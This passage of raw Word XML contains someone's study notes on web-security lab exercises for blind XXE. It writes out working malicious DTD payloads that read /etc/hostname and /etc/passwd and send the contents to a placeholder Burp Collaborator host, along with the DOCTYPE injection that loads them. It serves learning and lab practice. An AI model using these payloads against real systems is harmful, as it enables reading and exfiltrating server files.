        </w:rPr>
        <w:t xml:space="preserve">To do that, we build a </w:t>
      </w:r>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>malicious external DTD</w:t>
      </w:r>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> that first reads the file and then wraps its content into a URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D804F53" w14:textId="77777777" w:rsidR="005B19D0" w:rsidRPr="001E336A" w:rsidRDefault="005B19D0" w:rsidP="001E336A"/>
    <w:p w14:paraId="6F18E196" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="00B1101F" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t> Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28932BA2" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Using Burp Suite Professional, go to the </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="001E336A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Collaborator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001E336A">
        <w:t> tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FDAE4F" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Click "Copy to clipboard" to copy a unique Burp Collaborator payload to your clipboard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F14D8FB" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Place the Burp Collaborator payload into a malicious DTD file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD4C537" w14:textId="77777777" w:rsidR="001E336A" w:rsidRDefault="001E336A" w:rsidP="005B19D0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;!ENTITY % file SYSTEM "file:///etc/hostname"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C42803F" w14:textId="77777777" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>%file = parameter entity that loads the contents of /etc/hostname.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54458403" w14:textId="76B0AE34" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>The XML parser will try to resolve it and substitute its value with the actual file contents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569E9304" w14:textId="77777777" w:rsidR="001E336A" w:rsidRDefault="001E336A" w:rsidP="005B19D0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;!ENTITY % eval "&lt;!ENTITY &amp;#x25; exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6735085E" w14:textId="08D67751" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Here, %eval defines a new entity declaration on the fly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788ED942" w14:textId="096274B3" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Notice &amp;#x25; = encoded % → so we’re literally defining another parameter entity inside XML (%exfil).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B75E175" w14:textId="587EF645" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>%exfil will create a request to our Burp Collaborator domain with the file contents appended as a query string (?x=&lt;file content&gt;).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7AD799" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="005B19D0" w:rsidRDefault="001E336A" w:rsidP="005B19D0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>eval;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2FADC593" w14:textId="77777777" w:rsidR="001E336A" w:rsidRDefault="001E336A" w:rsidP="005B19D0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>exfil;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7FC65810" w14:textId="618D55F0" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Expanding %eval; creates %exfil.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27539193" w14:textId="2F357435" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Expanding %exfil; sends the HTTP request to our Burp Collaborator, carrying the file contents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38816CB3" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Click "Go to exploit server" and save the malicious DTD file on your server. Click "View exploit" and take a note of the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5833CFC4" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>You need to exploit the stock checker feature by adding a parameter entity referring to the malicious DTD. First, visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B669A5" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Insert the following external entity definition in between the XML declaration and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>stockCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t> element:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFFB7CF" w14:textId="77777777" w:rsidR="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE foo [&lt;!ENTITY % </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "YOUR-DTD-URL"&gt; %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D8187C" w14:textId="090F76BB" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="005B19D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> pulls our external malicious DTD from the exploit server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AD3C4D" w14:textId="6D4DDD92" w:rsidR="005B19D0" w:rsidRPr="005B19D0" w:rsidRDefault="005B19D0" w:rsidP="001E336A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B19D0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>That DTD then runs the whole chain above → fetch file → append it to URL → exfiltrate to Collaborator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233B4403" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t xml:space="preserve">Go back to the Collaborator </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>tab, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t xml:space="preserve"> click "Poll now". If you don't see any interactions listed, wait a few seconds and try again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ACE954" w14:textId="77777777" w:rsidR="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload. The HTTP interaction could contain the contents of the /etc/hostname file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD8331E" w14:textId="77777777" w:rsidR="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601BBAAC" w14:textId="77777777" w:rsidR="00A85D3B" w:rsidRPr="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="00A85D3B">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why we used these payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D53C97" w14:textId="77777777" w:rsidR="00A85D3B" w:rsidRPr="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="00A85D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>%file SYSTEM "file://..." → reads the local file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69823A1B" w14:textId="77777777" w:rsidR="00A85D3B" w:rsidRPr="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="00A85D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>%eval with &amp;#x25; → bypasses XML syntax limitations and lets us create a second entity on the fly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FC0210" w14:textId="77777777" w:rsidR="00A85D3B" w:rsidRPr="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="00A85D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">%exfil SYSTEM 'http://…/?x=%file;' → </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>actually sends</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> the data out-of-band.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE8EEBC" w14:textId="77777777" w:rsidR="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="00A85D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>External DTD (%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>) → needed because the injected XML space is too small/limited; we offload the complex payload to a hosted DTD file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B2AC7D" w14:textId="051BA44D" w:rsidR="00A85D3B" w:rsidRPr="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="00A85D3B">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">We chained parameter entities in an external DTD to exfiltrate /etc/hostname. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>First</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> we read it, then we re-declared a new entity to wrap that content into a Collaborator HTTP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>request, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> finally triggered it. This works because blind XXE doesn’t give direct responses, so the only way to leak data is to smuggle it out via DNS/HTTP to an attacker-controlled server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642EF956" w14:textId="3830DCDB" w:rsidR="001E336A" w:rsidRPr="00B1101F" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>6. Exploiting blind XXE to retrieve data via error messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECB8938" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>This lab has a "Check stock" feature that parses XML input but does not display the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715C0341" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>To solve the lab, use an external DTD to trigger an error message that displays the contents of the /etc/passwd file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F5D39D" w14:textId="77777777" w:rsidR="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>The lab contains a link to an exploit server on a different domain where you can host your malicious DTD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539C709F" w14:textId="6590BE62" w:rsidR="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="001E336A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CE495F5" wp14:editId="22A53C4B">
            <wp:extent cx="2194560" cy="1219200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="65584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4217" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId9"/>
                    <a:srcRect l="20392" t="54086" r="56790" b="23378"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2194560" cy="1219200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BBBAEB" w14:textId="4409A906" w:rsidR="00A85D3B" w:rsidRPr="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">instead of using Burp Collaborator to exfiltrate data, we </w:t>
      </w:r>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>force the application to error out</w:t>
      </w:r>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a way that leaks the file contents back in the error message. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468233AB" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="00B1101F" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t> Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C04F247" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Click "Go to exploit server" and save the following malicious DTD file on your server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CF4863" w14:textId="77777777" w:rsidR="001E336A" w:rsidRDefault="001E336A" w:rsidP="00A85D3B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;!ENTITY % file SYSTEM "file:///etc/passwd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207F1B9F" w14:textId="32179333" w:rsidR="00A85D3B" w:rsidRPr="00A85D3B" w:rsidRDefault="00A85D3B" w:rsidP="00A85D3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85D3B">
